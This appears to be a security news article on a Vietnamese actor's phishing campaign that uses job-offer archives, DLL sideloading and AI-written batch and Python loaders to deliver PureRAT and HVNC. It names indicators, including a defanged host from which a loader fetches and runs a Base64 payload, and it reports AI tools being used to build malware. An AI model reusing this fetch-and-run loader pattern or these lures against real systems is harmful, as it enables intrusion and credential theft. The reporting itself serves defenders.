A Vietnamese threat actor is using AI-authored code to power a phishing campaign that delivers the PureRAT malware and related payloads, leveraging realistic job-themed lures to compromise corporate systems.
The campaign, first documented by Trend Micro in December 2025, initially used malicious ZIP and RAR attachments posing as job opportunity documents.
More recent activity observed by Symantec shows an evolution in tactics: instead of attachments, phishing emails now direct victims to download archives hosted on Dropbox, likely to evade email security filters that more aggressively inspect or block executable attachments from unknown senders.
The activity highlights how AI is lowering the barrier for less-skilled cybercriminals to build and automate attack chains with professional-looking tooling.
These emails typically masquerade as marketing, project management, or strategy roles, using filenames tailored to well-known brands and corporate functions. Examples of malicious archives include:
New_Remote_Marketing_Opportunity_OPPO_Find_X9_Series.zipGlobal_Ads_Strategy_Role_Summary.zipOPPO_FindX9_New_Product_Promotion_Plan.zipAdvertising_and_Marketing_Henkel-AG_Smartwash.zipSAMSUNG_OLED_G5_Marketing_Dossier.zipDuolingo_Marketing_Skills_Assessment_oct.zip/.rar
Once opened, these archives usually contain an executable that sideloads a malicious DLL. Legitimate software is abused as the sideloading host, including Haihaisoft PDF Reader, old versions of Microsoft Excel, and renamed Foxit PDF Reader variants.
Rise of AI in Cyberattacks
The executables are often renamed to appear HR-related, such as Salary and Benefits Package.EXE, 2.Salary-benefits-bonus-KPIs(Job responsibilities).exe, or Duolingo_Marketing_Skills_Assessment_oct.exe.
The associated DLLs (for example, oledlg.dll, msimg32.dll, version.dll, profapi.dll) act as loaders for malicious batch scripts.
Those batch scripts strongly indicate AI assistance. One analyzed script, heavily commented in Vietnamese, creates a hidden %LOCALAPPDATA%Google Chrome directory, renames benign document.pdf and document.docx into huna.zip and huna.exe, and uses the latter (a bundled 7zip/WinRAR binary) to extract encrypted content using the password [email protected].
It then executes a Python interpreter (zvchost.exe) with an inline command that fetches Base64-encoded payload code from http://196.251.86[.]145/huna2, decodes it, and runs it.
Persistence is established via the Run registry key or scheduled tasks (e.g., 123456.exe), masquerading as ChromeUpdate, before finally reopening a benign PDF to maintain the illusion of a normal document workflow.
A second, “streamlined” batch variant includes even more obvious AI fingerprints: step-like structure, emoji-style markers in comments, and clean error handling.
AI-Powered Malicious Campaigns
Similarly, Python loaders used to deploy HVNC payloads include numbered sections, detailed debug output in Vietnamese and English, and explicit instructions to the attacker such as “Remember to paste the base64-encoded HVNC shellcode here.”
Multiple indicators tie the operation to Vietnam. Passwords such as [email protected], [email protected], and [email protected] reference a likely Vietnamese operator, with “Hwanxkiem” echoing Hoàn Kiếm, a district in Hanoi.
A GitLab profile (gitlab[.]com/kimxhwan) and filenames embedding that handle further reinforce this attribution. The moniker “Huna” is consistently used across filenames and passwords and may be the actor’s chosen alias.
The targeting and tooling suggest financially motivated cybercrime rather than espionage. By luring jobseekers possibly in multiple countries into opening malicious job offers on work devices, the actor appears to be seeking initial access into corporate networks.
PureRAT and HVNC payloads can then provide remote control, allowing the attacker to harvest credentials, move laterally, and ultimately sell access to other threat actors on criminal marketplaces.
This campaign underscores the growing risk of AI-assisted cybercrime: AI is not only enabling more convincing social engineering but also helping relatively low-skilled actors generate sophisticated code, automate complex infection chains, and iterate quickly on their tools.
Organizations should treat unsolicited job offers, especially those involving external file hosting and executable “documents,” as high-risk and ensure endpoint, email, and cloud controls are tuned to detect such behavior.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.